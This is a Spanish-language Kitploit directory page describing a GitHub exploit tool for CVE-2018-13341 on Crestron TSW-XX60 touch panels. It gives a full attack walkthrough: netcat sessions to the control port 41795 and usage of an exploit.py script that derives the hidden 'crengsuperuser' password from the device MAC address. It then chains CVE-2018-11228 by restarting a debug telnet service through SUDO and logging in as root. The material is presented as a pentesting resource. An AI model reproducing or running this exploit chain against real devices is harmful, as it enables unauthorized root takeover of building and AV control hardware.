Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2018-13341 — Esta herramienta tiene como objetivo explotar el CVE-2018-13341 | Kitploit
Herramientas/GitHubGitHub/rajchowdhury240/cve-2018-13341
Seguridad de Sistemas EmbebidosAtaques de ContraseñasAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad de Hardware e IoT
GitHubrajchowdhury240/cve-2018-13341

CVE-2018-13341

Esta herramienta tiene como objetivo explotar el CVE-2018-13341

Ver Repositorio
3hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2018-13341

Esta herramienta tiene como objetivo explotar el CVE-2018-13341. Usando la dirección MAC del dispositivo objetivo, se puede recuperar la contraseña de la cuenta oculta "crengsuperuser", que tiene privilegios elevados y permite ejecutar comandos SUDO.

El Protocolo de la Caja de Herramientas Crestron (CTP) se puede conectar accediendo al puerto 41795 en el dispositivo TSW-XX60.

root@kitploit:~
# nc -C w.x.y.z 41795
TSW-760 Control Console

TSW-760> estat

The EST command has been made obsolete. Please use IPCONFIG instead.
Ethernet Adapter [XYZ]:
	Link Status ....... : OK
	DHCP .............. : ON
	MAC Address ....... : 00.XX.XX.XX.XX.XX
	IP Address ........ : [removed]
	Subnet Mask ....... : [removed]
	IPV6 Address ...... : [removed]
	Default Gateway ... : [removed]


	DNS Servers ........ : [removed]    | DHCP      |
	                       [removed]    | DHCP      |

Requisitos

Esta herramienta requiere el módulo CryptoGraphy.

root@kitploit:~
# pip3 install cryptography

O

root@kitploit:~
# pip3 install -r requirements.txt

Empezando

root@kitploit:~
usage: exploit.py [-h] [-m MAC]


# Ejemplo
# python3 exploit.py -m aabbccddeeff
[*] Dirección MAC del dispositivo: AAXXYYZZ
[*] Contraseña para 'crengsuperuser': somerandompass

Explotando el CVE-2018-11228

El CVE-2018-11228 permite RCE no autenticada a través del Servicio de Shell Bash en el Protocolo de Terminal Crestron (CTP). Después de obtener la contraseña de la cuenta oculta "crengsuperuser", se puede obtener acceso root en la máquina.

root@kitploit:~
# nc -C w.x.y.z 41795

TSW-760 Control Console

TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> SUDO RESTARTSERVICE telnetd_debug
Username: crengsuperuser
Password: **************

Service telnetd_debug restarted

TSW-760>

Luego, en una nueva shell, se puede obtener acceso root en la caja.

root@kitploit:~
# telnet w.x.y.z

bash# whoami
root
root@kitploit:~
Créditos para: axcheron
Descargar herramienta